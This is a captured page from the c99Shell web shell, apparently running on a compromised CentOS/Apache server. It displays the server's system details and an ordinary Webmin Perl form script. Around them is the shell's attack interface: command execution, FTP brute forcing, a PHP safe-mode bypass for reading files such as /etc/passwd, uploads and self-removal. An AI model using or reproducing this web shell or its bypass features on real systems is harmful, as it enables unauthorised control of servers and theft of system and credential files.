!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/acl/   drwxr-xr-x
Free 49.58 GB of 127.8 GB (38.8%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     convert_form.cgi (1.3 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# convert_form.cgi
# Display a form for converting unix users to webmin users

require './acl-lib.pl';
$access{'sync'} && $access{'create'} || &error($text{'convert_ecannot'});
&ui_print_header(undef, $text{'convert_title'}, "");

@glist = &list_groups();
if ($access{'gassign'} ne '*') {
    @gcan = split(/\s+/, $access{'gassign'});
    @glist = grep { &indexof($_->{'name'}, @gcan) >= 0 } @glist;
    }
if (!@glist) {
    print "$text{'convert_nogroups'}<p>\n";
    &ui_print_footer("", $text{'index_return'});
    exit;
    }

print "$text{'convert_desc'}<p>\n";
print &ui_form_start("convert.cgi", "post");
print &ui_radio_table("conv", 0,
    [ [ 0, $text{'convert_0'} ],
      [ 1, $text{'convert_1'}, &ui_textbox("users", undef, 60)." ".
                   &user_chooser_button("users", 1) ],
      [ 2, $text{'convert_2'}, &ui_textbox("nusers", undef, 60)." ".
                   &user_chooser_button("nusers", 1) ],
      [ 3, $text{'convert_3'}, &unix_group_input("group") ],
      [ 4, $text{'convert_4'}, &ui_textbox("min", undef, 6)." - ".
                   &ui_textbox("max", undef, 6) ]
    ]);

print $text{'convert_group'}," ",
      &ui_select("wgroup", undef, [ map { $_->{'name'} } @glist ]),"<br>\n";
print &ui_checkbox("sync", 1, $text{'convert_sync'}, 1),"<p>\n";

print &ui_form_end([ [ undef, $text{'convert_ok'} ] ]);

&ui_print_footer("", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0113 ]--